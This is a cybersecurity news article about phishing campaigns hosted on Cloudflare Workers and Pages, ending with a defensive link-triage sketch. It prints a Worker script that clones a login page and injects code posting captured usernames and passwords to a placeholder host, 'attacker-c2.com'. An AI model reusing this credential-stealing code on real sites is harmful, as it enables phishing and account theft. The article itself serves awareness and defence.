Hackers Abuse Cloudflare Services for Sophisticated Phishing Attacks

Cybersecurity experts have identified a troubling new trend where threat actors are exploiting legitimate Cloudflare services to orchestrate highly convincing phishing campaigns.

The attacks, which began emerging in early 2025, leverage Cloudflare Workers and Pages to host malicious content that easily bypasses traditional security filters due to the trusted nature of Cloudflare’s infrastructure.

These sophisticated campaigns primarily target financial institutions and technology companies, with victims reporting credential theft and subsequent unauthorized access to sensitive systems.

The attack chain begins when victims receive seemingly legitimate emails containing links to what appear to be authentic login portals.

Rather than directing users to obviously suspicious domains, these links point to Cloudflare-hosted resources with authentic SSL certificates, lending credibility to the fraudulent sites.

The attackers further enhance the deception by implementing precise replicas of legitimate login interfaces, complete with corporate branding and expected functionality that creates a seamless illusion of authenticity.

Phishing page (Source – Hunt.io)

Hunt.io security researchers identified this campaign after observing a 43% increase in phishing incidents utilizing trusted cloud infrastructure over the past quarter.

Their analysis revealed that these attacks are likely conducted by an organized threat group with advanced capabilities and knowledge of cloud service configurations.

“What makes these attacks particularly effective is their abuse of implicit trust in Cloudflare’s infrastructure,” noted Lead Researcher Sarah Chen at Hunt.io.

The widespread adoption of Cloudflare across legitimate business websites creates a perfect environment for these attacks to flourish.

Traditional security solutions often whitelist Cloudflare resources, allowing malicious content to slip through defenses.

Organizations affected by these campaigns have reported significant data breaches resulting from the stolen credentials, with recovery costs estimated to exceed $2.3 million per incident.

Attack Infrastructure

The attackers deploy sophisticated JavaScript code within Cloudflare Workers that dynamically generates phishing pages tailored to each victim.

The malicious script intercepts credentials and exfiltrates them to attacker-controlled servers while providing convincing success responses to victims.

A simplified version of the malicious code appears below:

addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request))
})

async function handleRequest(request) {
  // Clone authentic login page from legitimate site
  const legitimateSite = await fetch('https://victim-company.com/login')
  let response = new Response(await legitimateSite.text(), legitimateSite)

  // Inject credential-stealing code
  response = new Response(
    response.body.replace('', `

        document.querySelector('form').onsubmit = function(e) {
          e.preventDefault();
          const creds = {
            username: document.getElementById('username').value,
            password: document.getElementById('password').value
          };
          fetch('https://attacker-c2.com/collect', {
            method: 'POST',
            body: JSON.stringify(creds)
          }).then(() => {
            window.location = 'https://victim-company.com/dashboard';
          });
        }
      `)
  )
  return response;
}

This technique allows attackers to maintain persistence while evading detection, as the phishing infrastructure leverages Cloudflare’s legitimate reputation and robust infrastructure to remain operational.
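Because allowlisting Cloudflare as a whole is what lets these links through, a mail or proxy filter can instead treat each tenant hostname on the shared Workers and Pages domains as untrusted unless the organisation owns it. The triage sketch below is an added example, not code from Hunt.io or from the campaign. It assumes the default `*.workers.dev` and `*.pages.dev` hostnames, uses a constructed policy (`example-corp` and the owned host are placeholders), and does not cover phishing served from custom domains.

```javascript
// Shared Cloudflare developer-platform suffixes: Workers (*.workers.dev) and Pages (*.pages.dev).
const SHARED_SUFFIXES = ['workers.dev', 'pages.dev'];

// Constructed sample policy: hosts the organisation itself deploys, plus terms to watch for.
const POLICY = {
  ownedHosts: new Set(['status.example-corp.workers.dev']),
  brandTerms: ['example-corp', 'examplecorp'],
  loginTerms: ['login', 'signin', 'sso', 'auth', 'verify', 'account'],
};

function normalizeHost(rawUrl) {
  try {
    const u = new URL(rawUrl);
    if (u.protocol !== 'https:' && u.protocol !== 'http:') return null;
    return u.hostname.toLowerCase().replace(/\.$/, ''); // drop a trailing root dot
  } catch {
    return null; // not a parseable absolute URL
  }
}

function sharedSuffixOf(host) {
  // Match on a label boundary so "workers.dev.evil.example" or "notpages.dev" do not count.
  return SHARED_SUFFIXES.find(s => host.endsWith('.' + s)) || null;
}

function classifyLink(rawUrl, policy = POLICY) {
  const host = normalizeHost(rawUrl);
  if (!host) return { verdict: 'unparseable', reasons: [] };
  const suffix = sharedSuffixOf(host);
  if (!suffix) return { verdict: 'not-shared-hosting', reasons: [] };
  // Trust is per hostname, never per parent domain.
  if (policy.ownedHosts.has(host)) return { verdict: 'allow', reasons: ['owned host'] };

  const tenantPart = host.slice(0, -(suffix.length + 1)); // labels chosen by the tenant
  const path = new URL(rawUrl).pathname.toLowerCase();
  const reasons = [`tenant content on ${suffix}, not an owned host`];
  if (policy.brandTerms.some(t => tenantPart.includes(t))) reasons.push('brand term in tenant label');
  if (policy.loginTerms.some(t => tenantPart.includes(t) || path.includes(t))) {
    reasons.push('login term in host or path');
  }
  return { verdict: reasons.length > 1 ? 'block' : 'inspect', reasons };
}

function triage(urls, policy = POLICY) {
  return urls.map(u => ({ url: u, ...classifyLink(u, policy) }));
}
```

Links that come back as `inspect` are candidates for sandboxed rendering or click-time rewriting rather than silent delivery.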


Tushar Subhra Dutta